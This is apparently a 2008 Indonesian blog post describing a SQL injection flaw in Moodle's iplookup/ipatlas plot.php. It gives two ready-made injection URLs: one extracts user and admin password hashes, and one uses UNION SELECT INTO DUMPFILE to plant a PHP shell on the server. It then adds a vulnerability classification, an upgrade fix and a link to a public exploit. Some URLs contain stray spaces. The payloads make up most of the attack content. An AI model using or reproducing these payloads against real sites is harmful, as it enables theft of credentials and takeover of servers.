-- Security Internet
Manual Testing Notes
to view user/admin password hashes:
http://[target]/[path]/iplookup/ipatlas/plot.php?address=127. 0.0.1&user='or%20isnull(1/0)/* to inject a shell:
http://[target]/[path]/iplookup/ipatlas/plot.php?address=127.0 .0.1&user='UNION %20SELECT%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, '%20',0,0,0,0,0,0,0,0%20INTO%20DUMPFILE%20'../ ../w ww/moodle/shell.php'%20FROM%20mdl_user/*
Solution Description
Upgrade to version 1.6dev or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
Vulnerability classification:
- Remote vulnerability
- Input manipulation attack
- Impact on integrity
- Exploit available
- Verified
Second checking :
http://www.milw0rm.com/exploits/1312
OK,
Thank you
Sabtu, 15 Maret 2008
BUG on moodle PHP
Langganan:
Posting Komentar (Atom)
0 coment-ar:
Posting Komentar